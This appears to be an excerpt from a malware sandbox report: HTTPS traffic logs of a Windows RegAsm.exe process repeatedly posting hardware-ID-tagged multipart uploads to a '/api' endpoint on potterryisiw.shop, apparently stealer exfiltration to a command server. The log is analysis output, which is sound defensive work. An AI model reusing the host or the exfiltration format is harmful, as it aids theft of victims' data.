2024-07-01 07:16:22 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18169 Host: potterryisiw.shop
2024-07-01 07:16:22 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:22 UTC	2838	OUT	Data Raw: 41 bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa Data Ascii: A~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'
2024-07-01 07:16:23 UTC	808	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i5ire2itqqsmdsr4ccal9fqtsc; expires=Fri, 25-Oct-2024 01:03:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WusSX44HkCF%2ByjUk0q3oiCRUsOt7mSk%2FLhlgdSv82cIFME84uiymQyTNtd4pYGc7BBww9Ng%2BGOFYYy%2Fp4eVEFhvssN8n2u1UTz1FGKNWKq38WDXbJyogQkc9Al1lSyKcmzg2%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c3bf8b84252-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:23 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49768	188.114.97.3	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:24 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8790 Host: potterryisiw.shop
2024-07-01 07:16:24 UTC	8790	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:24 UTC	818	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=35ovpr7ghk0tqjfsai44j60200; expires=Fri, 25-Oct-2024 01:03:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qVG88mBQpne%2F%2F1T3wOh5k%2FHnZYHbZG%2BbRJwQkCuTSs7D1Hmpqe8DHhzlsiFkidh1f%2BAqUHiYM3LJQLl8Hil3J%2F%2FerH0A5BeuFm%2B3OW5OAvothSd7%2FNNyrB%2FOKaCG6rndNeyX9A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c427fcd4401-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:24 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49772	188.114.97.3	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:25 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20443 Host: potterryisiw.shop
2024-07-01 07:16:25 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:25 UTC	5112	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 Data Ascii: `M?lrQMn 64F6(X&7~
2024-07-01 07:16:26 UTC	812	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=li661u6t70gat5pk8fjf92sfvu; expires=Fri, 25-Oct-2024 01:03:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2F%2FZomuiLeZ0MHDxQz5%2Bo%2BP5HFUUgW2YRCjOBgQGtdgMCIut4DweKpyEwmnCyj7NSCRyBukiG978N8F%2BpOpS6sblDHUaiHH0bTHf%2BrhtmYI1C%2FD2E8btBMCkbiLqXhACsdJZTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c4aae9341e9-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:26 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49774	188.114.97.3	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:26 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7088 Host: potterryisiw.shop
2024-07-01 07:16:26 UTC	7088	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:27 UTC	808	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2g16084a0qtsd6mlttuci2ggsc; expires=Fri, 25-Oct-2024 01:03:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3QI1yKU5DxlvMyZVOMV4NMNgNcmn5vj43iH%2BIAE8mOWXB2amx%2Fx2N6ya%2BiTRe7QpWvJMcZB3%2FfyrsIyC6U6Ze3D8uA7%2BWETyYplHld6szDRlTcQRiTioyfo308WPmvYap5aoTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c550f7e4259-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:27 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49777	188.114.97.3	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:28 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1369 Host: potterryisiw.shop
2024-07-01 07:16:28 UTC	1369	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:28 UTC	806	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6948jgrvfbfnbmhd6vn9p3q7vo; expires=Fri, 25-Oct-2024 01:03:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AcnUaK%2Btv62PYhbTeBjTeEyiXKCoGqumsavYxUltqJwm2kKRaZPGYwHT60jPeHnJN7sUUPFN3JcZlgWHG%2Fmks4ht9GHfw32mj1r94%2FS0sOqkJ0X8CsqzV%2Blc0AwXU2Gt2IEH3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c5bad8d443e-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:28 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49781	188.114.97.3	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:30 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 448909 Host: potterryisiw.shop
2024-07-01 07:16:30 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:30 UTC	15331	OUT	Data Raw: b5 8c 68 4d c1 19 41 a0 60 58 cc 2b 69 35 de 22 69 9b 9a fb 1f 6e eb b5 56 8c 71 c9 40 42 8b 5f ca d0 29 46 57 90 67 f7 2b cf 48 f4 f7 34 ca 47 f9 94 b8 d3 05 50 d9 35 7b ba 05 d5 cd eb 56 72 c0 bc 0b 17 33 e4 6c 4b bb 5f 9c 9a 18 35 77 46 67 bf 20 9c d9 88 43 00 f9 d7 4d 86 c6 65 26 1b 67 e5 e2 5e d7 42 24 6d 50 fa 0d 5f bd 63 43 83 03 ff fc 85 01 3f 38 00 18 85 40 5b 08 08 28 be 7a aa 05 68 c3 1c 43 90 22 66 7c 6c bb cd 34 6a af aa 07 92 e9 94 eb 70 0b 23 f1 58 3a eb 98 85 3f bd a3 5e ec 0c 97 7c d1 6c 76 ad aa 33 14 40 64 23 14 03 0d f5 38 62 f8 cb 30 c4 70 b4 f8 46 52 28 9b bb dd 03 af e3 ed 58 4f f0 4e 36 8f 07 e0 5b ae 93 5d 6a 3c df 3f 4a ac b1 b7 8b 8e 0b 8e c4 db d4 0f 4d 0a b5 64 58 a0 ee 84 33 eb 32 6c 2f fa 9b 83 4c 6b 28 ed 0b 5c af 65 0b c3 Data Ascii: hMA`X+i5"inVq@B_)FWg+H4GP5{Vr3lK_5wFg CMe&g^B$mP_cC?8@[(zhC"f\|l4jp#X:?^\|lv3@d#8b0pFR(XON6[]j<?JMdX32l/Lk(\e
2024-07-01 07:16:30 UTC	15331	OUT	Data Raw: 92 53 04 4c 17 21 6c 95 2c f9 01 f5 a1 cc 61 e6 ad f1 44 19 f3 02 37 80 20 89 9d 0c 4c 8c 9e 2a 3b 87 b3 2e 18 59 47 b5 71 eb e9 8a cd dd 55 84 8c a2 47 76 10 86 9d 76 e6 3b c7 d0 62 97 c2 cd 1f e6 68 1f 96 40 0d 15 54 2a 05 29 47 8f 88 58 85 a6 68 c1 61 35 11 42 a8 cc d0 80 b4 8e f8 80 b2 ac 4e 2d 30 20 f6 15 90 1c 58 c7 49 01 f8 7e 89 dd 1d 72 cc 9f cf a3 8d f7 6b 25 17 3a 38 4c 8a 58 af 78 15 28 50 5f 29 9e 74 5f 2d 34 b1 fc 9c 97 71 31 1b 25 08 c1 06 ec 02 62 8e 9e c2 09 16 f7 72 3a 59 53 43 c7 df 35 fb b3 f8 17 ee 82 ea 56 04 73 25 fe 51 db c4 22 fa 5f 77 25 1c 71 3c bf 18 52 29 56 8b 1c 20 90 c9 90 c9 af ac 38 6e 87 2d 3d 73 aa cd f4 7a 8b ac 5f 59 ed f5 5a 13 08 35 f9 3c 2e 2a 05 95 11 11 41 07 5f 14 cd c0 ad 77 25 68 4b f2 d6 de e9 de 10 88 83 b2 Data Ascii: SL!l,aD7 L;.YGqUGvv;bh@T)GXha5BN-0 XI~rk%:8LXx(P_)t_-4q1%br:YSC5Vs%Q"_w%q<R)V 8n-=sz_YZ5<.*A_w%hK
2024-07-01 07:16:30 UTC	15331	OUT	Data Raw: ec 4f c4 c4 9f 23 cb 94 6f ff bc 43 21 f1 bd e5 38 03 c2 cf bd f8 56 a0 0c af b1 a3 04 1c 5c 4b e5 a1 a3 a1 67 35 cb b0 df c7 c1 3e 0b 97 e1 17 3d c8 6d 7b 6f 41 7a 5d 9c 1a cd 4f 5c dc 39 86 77 ad 35 19 3e 7f 22 2c 20 09 85 7e 79 f9 8a e3 24 b3 68 09 f1 4d 2f 6c 8b 1d b4 6c 9b 1b d3 f8 1e ad d1 52 93 af 7e ce fc 1c e4 a7 34 df e2 f1 ed 93 47 e6 e2 0d bb c9 7f 6e 11 6b 8f 37 15 f2 05 d7 41 23 86 24 08 0b 43 b4 49 ac 3e 5b 34 6b 56 fd cf 5e ba 4e 51 1e a5 fa eb ea d6 83 af 3f 97 0b 23 80 86 73 f9 22 48 f7 59 2d 5c 54 ab f1 90 69 ce c4 a3 c7 60 6b 7a b4 42 d7 7b 73 c4 66 a7 b8 73 e1 81 03 2d 0b a8 00 54 82 99 fa 3a ab 68 6d 4f db 33 7b df a7 6b 81 0d ba c8 4a a6 89 89 85 98 64 21 76 e5 8c e0 43 12 d9 8f 6c f4 e0 ed f1 73 bf cb 9d 7f 5f 3c b3 1f ff 42 36 fc Data Ascii: O#oC!8V\Kg5>=m{oAz]O\9w5>", ~y$hM/llR~4Gnk7A#$CI>[4kV^NQ?#s"HY-\Ti`kzB{sfs-T:hmO3{kJd!vCls_<B6
2024-07-01 07:16:30 UTC	15331	OUT	Data Raw: c5 af 7b 6b ab b6 9b aa a8 7b 53 03 64 bf 33 33 97 e6 c7 9e df f0 fa e7 96 19 ae 4d dd dd d3 2f 71 af 3e 36 c3 69 0b 5b fb 51 f8 e3 c4 0b 67 74 21 b5 a4 bf 2b 21 66 a1 0a 27 87 f7 1c c0 f0 d0 30 34 9c 4c 7a 0b 0b 81 36 99 44 49 90 39 40 e7 4e b4 11 46 85 ad 10 24 e0 f9 bc 59 b7 bf 03 88 0a 08 93 97 9f 71 f4 a8 86 a5 09 93 b3 6b d5 1e 87 d0 39 ad f1 32 e9 34 c3 8b d2 0f 28 f4 45 7d fb 93 95 48 8a cf a6 42 f6 5e 68 e9 86 05 5c b5 4b 72 11 64 60 b7 af e5 26 6a c0 35 ff e4 10 13 c6 05 e5 af 0b 8a 5e b2 45 0f e1 60 78 bb 30 9d f9 78 6b df 81 95 67 30 2d dd e7 37 fd 4a 70 29 21 e2 b0 fa 67 70 22 c5 70 e6 7b 78 b5 d4 e3 ad 04 46 e1 b0 72 ff af d1 e3 67 af 09 1c a0 48 d1 a5 48 d2 17 29 42 7f f6 4d 14 bd c2 fb 6c 4e 8a a7 e3 2a 6b 8b 38 87 44 c7 15 e8 b5 d2 73 81 Data Ascii: {k{Sd33M/q>6i[Qgt!+!f'04Lz6DI9@NF$Yqk924(E}HB^h\Krd`&j5^E`x0xkg0-7Jp)!gp"p{xFrgHH)BMlN*k8Ds
2024-07-01 07:16:30 UTC	15331	OUT	Data Raw: 63 8a 1d 17 c1 0f 39 86 2c cc 5d af 4c 83 1b 78 20 5a 3e 20 dd ee a3 7f 93 f7 8d 5d 14 a6 a8 6f 72 8d 0f 8a ad ff 7a 25 a7 76 a4 28 fe db 63 32 77 12 a4 fa 61 65 37 a1 12 f6 40 e3 4d f5 fd ee dd 39 ff d3 d0 d4 00 0a d3 7e 92 94 ef 4b dd d1 f5 0f 78 32 b4 bd 2e 22 0d d6 a2 36 1b ed 33 34 0b f7 71 e7 f7 3f 05 f8 0b 94 be f6 4f 7f 71 a9 03 52 0b 0c 2d c3 e4 02 68 6b 5c 3a 4e 26 4d 67 c7 5d 39 e9 3e c9 84 8c ea ee 77 d4 06 93 f0 5c f9 93 95 48 a8 36 8e 45 b8 71 98 e7 49 95 86 47 8f 7e 86 a0 9e 8d 33 57 41 3d d9 43 52 54 95 08 f4 d9 28 bd 9c cd c2 a4 96 ed 33 47 f0 79 94 70 61 f0 e7 ce 1a c7 4e c0 95 66 1b fb a8 f5 c3 2e e0 e7 46 16 2d fe 64 8d 27 e2 e0 79 6e a2 b9 7a 52 72 38 ff da 77 a1 10 cf 55 dc 18 58 7c fa bd 3a 40 5a 9c f0 80 24 4d 4b 33 0d d2 66 b5 b6 Data Ascii: c9,]Lx Z> ]orz%v(c2wae7@M9~Kx2."634q?OqR-hk\:N&Mg]9>w\H6EqIG~3WA=CRT(3GypaNf.F-d'ynzRr8wUX\|:@Z$MK3f
